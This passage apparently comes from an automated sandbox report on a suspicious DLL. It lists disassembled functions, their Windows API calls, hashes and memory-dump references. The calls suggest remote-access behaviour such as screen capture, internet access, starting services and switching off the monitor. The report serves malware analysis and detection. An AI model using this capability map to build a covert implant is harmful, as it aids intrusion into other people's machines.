                                                          • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 100192EA
                                                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001930A
                                                          • DeleteObject.GDI32(?), ref: 10019332
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object$CreateDeleteSectionSelect
                                                          • String ID:
                                                          • API String ID: 3188413882-0
                                                          • Opcode ID: c47ec7ba65a712e0d1f3a3476198e4529758ddf825267e59d987f02d8c4fa404
                                                          • Instruction ID: 171a801546ab23d17400ea9514ceaa77a6b5348b798b605dacd974edddfe344e
                                                          • Opcode Fuzzy Hash: c47ec7ba65a712e0d1f3a3476198e4529758ddf825267e59d987f02d8c4fa404
                                                          • Instruction Fuzzy Hash: C831D2B6200705AFD214DF59CC84E27F7AAFB88600F148A1EFA5987791C771F9008BA0
                                                          Function 100215E0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #825.MFC42(?,?), ref: 10021631
                                                          • #825.MFC42(?), ref: 1002168E
                                                          • ??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216A2
                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216C5
                                                          • #825.MFC42(00000000), ref: 100216D0
                                                            • Part of subcall function 10022900: #825.MFC42(?,?,1012C4B0,?,1002162E,?), ref: 10022922
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825$Lockit@std@@$??0_??1_
                                                          • String ID:
                                                          • API String ID: 3320149174-0
                                                          • Opcode ID: 92a739d06bdc15bc2c0b8dbff828faa4f9d8d67b9b0aa77d23071a609134f6d1
                                                          • Instruction ID: d069f6ed0b23540ba227ea0268739682af56c83980c4ac9031e4afce5f99edac
                                                          • Opcode Fuzzy Hash: 92a739d06bdc15bc2c0b8dbff828faa4f9d8d67b9b0aa77d23071a609134f6d1
                                                          • Instruction Fuzzy Hash: EE31AEB96007559FC710DFA8E8C485EB3E9FB98750799481DE85A83A00EB34FD048B92
                                                          Function 10012B00 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID: y$y
                                                          • API String ID: 2038078732-2085659379
                                                          • Opcode ID: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                          • Instruction ID: b3f128dd8a4f2f937591d2b39a566a4fd65ce5111e4adbe3f1b9da6999f925d3
                                                          • Opcode Fuzzy Hash: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                          • Instruction Fuzzy Hash: F0212C796082145BD200DB68BC95AAF77D9EBC4610F440439FD49D7341DBB5EA0982E7
                                                          Function 10011A20 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #6662.MFC42(0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3,00000000,00000000,00000000), ref: 10011A82
                                                          • #4278.MFC42(1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3), ref: 10011A9E
                                                          • #6883.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AB2
                                                          • #800.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AC3
                                                          • #6662.MFC42(0000005C,00000001,?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798), ref: 10011AD0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #6662$#4278#6883#800
                                                          • String ID:
                                                          • API String ID: 2113711092-0
                                                          • Opcode ID: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                          • Instruction ID: f4fe6630835c94391bfcc8c2be099bdb1318b56aaed041f5013be16c963cdde2
                                                          • Opcode Fuzzy Hash: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                          • Instruction Fuzzy Hash: A611F0363016159BDB18DE29DC45BAEBB95EF846B0F81072CF82A8B2C0DA34EC458691
                                                          Function 10009540 Relevance: 7.6, APIs: 5, Instructions: 66memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,?,00000001,00000000,?,?,00000065,1000878E,00000001,00000001,?,00000001,00000001,00000001), ref: 1000956E
                                                          • LocalAlloc.KERNEL32(00000040,00019000,?,?,00000065,1000878E), ref: 10009583
                                                          • ReadFile.KERNEL32(?,00000009,00018FF7,?,00000000,?,?,00000065,1000878E), ref: 100095B0
                                                          • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095CD
                                                          • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095E7
                                                            • Part of subcall function 10009600: CloseHandle.KERNEL32(?,00000000,100095E2,?,?,00000065,1000878E), ref: 1000960F
                                                            • Part of subcall function 10009600: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,00000001,00000000,100095E2,?,?,00000065,1000878E), ref: 1000963C
                                                            • Part of subcall function 10009600: #825.MFC42(00000001,?,?,00000065,1000878E), ref: 10009643
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$FileFree$#825AllocCloseD@2@@std@@D@std@@HandlePointerReadTidy@?$basic_string@U?$char_traits@V?$allocator@
                                                          • String ID:
                                                          • API String ID: 1358099757-0
                                                          • Opcode ID: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                          • Instruction ID: c1002f4ed646788d97939a754a35c43ee484aff7721c1be338d8eb9f0dbbf468
                                                          • Opcode Fuzzy Hash: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                          • Instruction Fuzzy Hash: 911172B63007029BE310CF69DC84B97B7E9FB88361F148A29F655C7281C730E815CB65
                                                          Function 10016C50 Relevance: 7.6, APIs: 5, Instructions: 63windowsleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10010B70: LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
                                                            • Part of subcall function 10010B70: GetProcAddress.KERNEL32(00000000), ref: 10010B84
                                                            • Part of subcall function 10010B70: Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
                                                            • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000076), ref: 10016FE0
                                                            • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000075), ref: 10016FF3
                                                          • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 10016CA5
                                                          • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 10016CB8
                                                          • Sleep.KERNEL32(000000C8), ref: 10016CF5
                                                            • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
                                                            • Part of subcall function 10016640: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
                                                            • Part of subcall function 10016640: CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
                                                            • Part of subcall function 10016640: #823.MFC42(000001F0), ref: 100166B0
                                                            • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
                                                          • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10016CD4
                                                          • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 10016CE7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CapsDeviceExchangeInfoInterlockedMessageParametersSendSleepSystem$#823AddressCloseHandleLibraryLoadObjectProcSingleWait
                                                          • String ID:
                                                          • API String ID: 2254935227-0
                                                          • Opcode ID: 69c5405765d8cd14f1056ea885181365182fd0a05cfc07f6a81b8f4b8d9126f7
                                                          • Instruction ID: ff05f8586191e565f2e6c2b158e0b16d5a6b007ebb4d99bd3008ae6250e7dcc5
                                                          • Opcode Fuzzy Hash: 69c5405765d8cd14f1056ea885181365182fd0a05cfc07f6a81b8f4b8d9126f7
                                                          • Instruction Fuzzy Hash: 5711E13438435969E960EB244C52FAA7796EF49B50F200139BF49AF2D3C9F4F8849564
                                                          Function 10022440 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #823.MFC42(00000018,?,?,?,?,100215C5,100215A5,?,?,100215A5), ref: 1002245E
                                                          • ??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 10022478
                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 100224AA
                                                          • #825.MFC42(00000000,?,?,?,?,?,100215A5), ref: 100224B5
                                                          • #823.MFC42(00000018,?,?,?,?,?,100215A5), ref: 100224C5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823Lockit@std@@$#825??0_??1_
                                                          • String ID:
                                                          • API String ID: 2469163743-0
                                                          • Opcode ID: f025e2dd79729062f08b7a7721333646b4a01c05b3f9230da3a5a91d9fb2e898
                                                          • Instruction ID: 8355ca7f01a83ae40642ce5fe98aa8143934db94241ffe974ce41ae393d7af5b
                                                          • Opcode Fuzzy Hash: f025e2dd79729062f08b7a7721333646b4a01c05b3f9230da3a5a91d9fb2e898
                                                          • Instruction Fuzzy Hash: 36119DB1505345AFC300DF99E8C0856FBE4FF58310B55806EE58987B22D774B945CB92
                                                          Function 10024A90 Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
                                                          • lstrcpyW.KERNEL32(?,00000000,00000000), ref: 10024AD4
                                                          • WTSFreeMemory.WTSAPI32(?), ref: 10024ADF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000200,?,000000FF,00000000,00000104,00000000,00000000,?), ref: 10024B18
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 10024B2B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$ByteCharFreeInformationMemoryMultiQuerySessionWide
                                                          • String ID:
                                                          • API String ID: 2394411120-0
                                                          • Opcode ID: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                          • Instruction ID: 955f71c2f156101e58c3954c60e55afc292817027518ed639cbb0e0337d6e5ae
                                                          • Opcode Fuzzy Hash: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                          • Instruction Fuzzy Hash: C61165751183417BE310CB58CC45FEB73E8BBC8B10F044A1CF659962C0E674A5088B62
                                                          Function 1001A380 Relevance: 7.6, APIs: 5, Instructions: 52filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: fgets$fclosefopenstrncpy
                                                          • String ID:
                                                          • API String ID: 2591305919-0
                                                          • Opcode ID: 77209377daff59115616ab6e289239f370c7568974e9fd3ecc01b251fc87ae2e
                                                          • Instruction ID: 6ad302e1cb297ef1bbbfed3f052a12079a62e59ca5e52546dd175ba7e75c563e
                                                          • Opcode Fuzzy Hash: 77209377daff59115616ab6e289239f370c7568974e9fd3ecc01b251fc87ae2e
                                                          • Instruction Fuzzy Hash: 4401F2726002257BE301D76CED81BDB37DCEF88355FD50524F988D6240EB79DA8486A2
                                                          Function 10011980 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #858.MFC42(-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119AB
                                                          • #6874.MFC42(0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119B4
                                                          • #6874.MFC42(0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119C5
                                                          • #6874.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119D6
                                                          • #800.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119E7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #6874$#800#858
                                                          • String ID:
                                                          • API String ID: 833685189-0
                                                          • Opcode ID: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
                                                          • Instruction ID: 01b43e94da0ea2eb4e39674b02d587f3c921b09ce4ba7a4e708dea5c2d38b77a
                                                          • Opcode Fuzzy Hash: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
                                                          • Instruction Fuzzy Hash: A401F471208B82AAC704CF54EA15F9AFBD5EB90B60F00063EF0A5476D1DB74E9088392
                                                          Function 1001FEE0 Relevance: 7.5, APIs: 5, Instructions: 32serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,00000000,1001FB22,1011EC82,?,?,?,?,?,?,?,?), ref: 1001FEE7
                                                          • OpenServiceA.ADVAPI32(00000000,?,00020000,?,?,?,?,?,?,?,?), ref: 1001FF00
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 1001FF0B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: OpenService$CloseHandleManager
                                                          • String ID:
                                                          • API String ID: 4136619037-0
                                                          • Opcode ID: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
                                                          • Instruction ID: efb21d9ce1343172679c2ebe97ca72b077adbb798532605da40d3010ccc8a93c
                                                          • Opcode Fuzzy Hash: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
                                                          • Instruction Fuzzy Hash: 30E09236219231A7E2217729BC88FDB67A8EFD9791F0B0156F608DA190C6A0D88245E8
                                                          Function 10027260 Relevance: 7.5, APIs: 5, Instructions: 31serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,?,10028552), ref: 10027267
                                                          • OpenServiceA.ADVAPI32(00000000,?,00010010,?,00000065), ref: 10027280
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000065), ref: 10027297
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 1002729E
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 100272A1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
